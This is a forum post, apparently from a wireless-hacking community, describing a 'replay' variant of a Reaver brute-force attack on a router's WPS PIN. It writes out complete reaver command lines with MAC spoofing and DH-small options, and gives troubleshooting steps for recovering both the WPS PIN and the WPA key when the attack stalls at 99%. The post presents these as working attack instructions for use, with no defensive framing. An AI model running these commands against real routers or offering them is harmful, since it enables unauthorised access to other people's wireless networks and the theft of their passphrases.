Jump to content

The Reaver DH-Small 99% Replay attack


Recommended Posts

Musket Teams developed what we term the Reaver Replay Attack for our own use. We have published this previously but have found a mac-spoofing twist. Using a simple reaver command line did not work against the targeted router. To drag WPS pins out of the router we had to use the longer command line suggest by the author of autoreaver:

reaver -i mon0 -a -f -c 1 -b XX:XX:XX:XX:XX:XX -r 3:10 -E -S -vv -T 1 -t 20 -d 0 -x 30 --mac=00:11:22:33:44:55

The pins jumped from less than 10% up to 91% but it still took two days to move thru approx 1000 pins. Finally as we suspected would occur, at 99% the pins spun endlessly


To solve the problem we used the replay attack - we ran reaver again:

reaver -i mon0 -c 1 -b XX:XX:XX:XX:XX:XX -r 3:10 -E -vv -T 1 -t 20 -d 0 -x 30 --mac=00:11:22:33:44:55

We removed the -a and the -f and the -S use DH-SMALL

Reaver asked us to restore previous session AND WE SELECTED NO

This started reaver with a new session BUT NOT using DH-Small

The WPS pin fell out after a single successful pin request HOWEVER there was no WPA key?

Confused we ran the attack again -still no WPA Key


We checked the command line and found that the mac address that we were spoofing had not been set up properly. The mac in the reaver command line did not match the actual spoofed mac address. We corrected, this, ran the reaver attack again, ie new session without DH-small and bingo both the WPA Key and the WPS pin were provided. Note the mac problem only occured when we ran the replay. In all other sessions the mac was correct as we used our new version of VMR-MDK009x.sh which will be released soon, However the replay was done from the command line. .

In short if the WPS pin spins at 99:99%. Restart the attack from the beginning, remove the -S DH-small. Make sure the mac address you are spoofing in the reaver command line is the mac address shown for the monitor when you type ifconfig.

We have duplicated the reaver replay attack many many times however the mac problem was something new.


Edited by musketteams
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...